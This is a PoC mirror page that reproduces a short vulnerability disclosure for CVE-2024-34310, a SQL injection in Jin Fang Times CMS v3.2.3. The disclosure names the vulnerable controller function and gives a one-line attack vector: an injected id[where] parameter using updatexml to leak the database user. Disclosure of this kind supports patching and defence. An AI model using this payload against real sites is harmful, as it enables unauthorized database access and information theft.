Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-34310 PoC — Jin Fang Times Content Management System 安全漏洞

Source
Associated Vulnerability
Title:Jin Fang Times Content Management System 安全漏洞 (CVE-2024-34310)
Description:Jin Fang Times Content Management System是Jin Fang Times公司的一个内容管理系统。 Jin Fang Times Content Management System v3.2.3版本存在安全漏洞,该漏洞源于存在通过id参数的SQL注入漏洞。
Description
CVE-2024-34310
Readme
# CVE-2024-34310
CVE-2024-34310
> [Suggested description]
> Jin Fang Times Content Management System v3.2.3 was discovered to
> contain a SQL injection vulnerability via the id parameter.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> https://www.bjjfsd.com/
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Jin Fang times content management system - 3.2.3
>
> ------------------------------------------
>
> [Affected Component]
> public function data_show($id = 0) {
>
>     if (empty($id)) {
>
>         $this->redirect('index');
>
>     }
>
>  $info = M('News')->find($id);
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
>
> ------------------------------------------
>
> [Discoverer]
> yishan
>
> ------------------------------------------
>
> [Reference]
> http://jin.com
> https://www.bjjfsd.com/

Use CVE-2024-34310.
File Snapshot

[4.0K] /data/pocs/79fc10752605b452bb13e4cbec3aeca48de94a5e └── [1.3K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.